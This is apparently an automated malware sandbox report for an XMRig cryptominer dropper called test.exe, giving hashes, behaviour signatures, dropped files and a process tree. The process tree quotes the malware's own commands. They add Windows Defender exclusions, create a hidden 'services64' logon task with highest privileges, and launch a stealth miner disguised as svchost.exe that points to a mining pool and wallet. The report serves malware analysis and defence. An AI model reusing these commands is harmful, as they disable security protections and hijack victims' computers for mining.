Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    1197s
  • max time network
    1188s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04/09/2024, 18:22

General

  • Target

    test.exe

  • Size

    29.7MB

  • MD5

    531a4e282c420c64d7b545a9c4e0fb4d

  • SHA1

    998d298e9ff967bec6f03bf8e8e8f03b4b3728db

  • SHA256

    98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c

  • SHA512

    c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730

  • SSDEEP

    786432:k99QkndbvqJ6+eH57FU4hxLq54xTxyCuYWQzJ2Mbvn:i1nM8hHxPhxO5iTECuYWQzJ7bv

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\test.exe
    "C:\Users\Admin\AppData\Local\Temp\test.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4388
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\test.exe"
      2⤵
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3624
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2172
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:220
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4208
        • C:\Windows\system32\services64.exe
          C:\Windows\system32\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1896
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
            5⤵
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3568
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:60
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1928
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1792
            • C:\Windows\System32\svchost.exe
              C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:3333 --user=47nUe8D3z4bjgwqG9v4tKY3sBMcoEdvQ3iJMC8A8udU7DngaeR7hNhKETaaQD1iWhadw6j9iNWqf6fKiVcMy35kdVbxAzyD --pass= --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4768

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

    Filesize

    646B

    MD5

    bf38f16ed068942cc8702d531b1650e5

    SHA1

    36c09a518beeb0db3d7e4cad6c2bbf1bc4f5ed90

    SHA256

    72c9c0870bfec80a95bb63038304da81999329f6343e6b8069149ca535d49e10

    SHA512

    1cbd6c7777301f24fd8cb2335004377370a8a24fadb0fa4bc61de814dd39a058ff2f419cefd462f30322eceb1ff17d3cd7cf1af97a8f1aaa3d00595129104368

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    8592ba100a78835a6b94d5949e13dfc1

    SHA1

    63e901200ab9a57c7dd4c078d7f75dcd3b357020

    SHA256

    fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

    SHA512

    87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    73fdfb9dc99b3a859ced4fdcadd43d0e

    SHA1

    8b0b0446ebd85c323660ce40b0a2dbfda8ab7219

    SHA256

    168068d4f6f1ffe55f4ac52442bcdd74c7ffe1a21a200dfc579a0738162de2b8

    SHA512

    06bb3a382dbc28f0b311e5a5945503106eff5bf40b820a6a36fa8088299358cf6cfee410bc09aa55bc867bf56290973a6d1f75fe198562f629654cb2b60c9c2a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    4b396e31ba743838c9e8e6a95bd5ea42

    SHA1

    e61d5b0b5dc4971247338a9f81c5a20b805fab0e

    SHA256

    996879d073d5b879672f2df53c453ae9134184189bcb651105ed4fd60b199b34

    SHA512

    46ec040d810eec3c9ade4dd4b8b605327ed52e5ea8f87a6b6161fe105f278b8f70a24ab227dc1913514a997adc4d4ca8e91cd4830872ca7a7cd59cb01c5ec13b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    db57660ea1f4594299412c42472b74e4

    SHA1

    542768a32d1dc530251f28999ee170a055b5f24d

    SHA256

    49ae8602071913944ce9f68e02ef2ffc0d3f62f45e278aa1e391796cff3f7496

    SHA512

    eaa5ad86c7f3ee8ab415151d86681d6f6d12eef4514191c34b6419c25b655b0e7cf79cc085d59c076f18421ccd168619ebbdf82cc5b1f30df9429b390d1ac2b7

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfwogljj.bzt.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Windows\system32\services64.exe

    Filesize

    29.7MB

    MD5

    531a4e282c420c64d7b545a9c4e0fb4d

    SHA1

    998d298e9ff967bec6f03bf8e8e8f03b4b3728db

    SHA256

    98ced6e951485c45ebdeda3bbc04bd2918867e0490900b39789d9b4637a7409c

    SHA512

    c1d8296e2ba1e1ca9e1860548b884414e2cde06c584c40a4306d248b9c9ccbbff7e55a717d742ea14cc849db41838cfa6feb7638d888c627ff95abcb13df6730

  • memory/1912-102-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

    Filesize

    9.9MB

  • memory/1912-6-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

    Filesize

    9.9MB

  • memory/1912-4-0x00007FFB65DB3000-0x00007FFB65DB4000-memory.dmp

    Filesize

    4KB

  • memory/1912-13-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

    Filesize

    9.9MB

  • memory/1912-11-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

    Filesize

    9.9MB

  • memory/1912-10-0x0000018364EC0000-0x0000018364ECA000-memory.dmp

    Filesize

    40KB

  • memory/1912-101-0x00007FFB65DB3000-0x00007FFB65DB4000-memory.dmp

    Filesize

    4KB

  • memory/1912-0-0x000001835F7F0000-0x00000183615A6000-memory.dmp

    Filesize

    29.7MB

  • memory/1912-107-0x00007FFB65DB0000-0x00007FFB6679C000-memory.dmp

    Filesize

    9.9MB

  • memory/1912-9-0x0000018364E90000-0x0000018364EA2000-memory.dmp

    Filesize

    72KB

  • memory/1912-7-0x0000018300000000-0x0000018301DB6000-memory.dmp

    Filesize

    29.7MB

  • memory/3676-18-0x00000132E8FB0000-0x00000132E8FD2000-memory.dmp

    Filesize

    136KB

  • memory/3676-21-0x00000132E9180000-0x00000132E91F6000-memory.dmp

    Filesize

    472KB

  • memory/4768-165-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-166-0x000001A568040000-0x000001A568060000-memory.dmp

    Filesize

    128KB

  • memory/4768-167-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-171-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-170-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-169-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-168-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-162-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-221-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-223-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4768-222-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB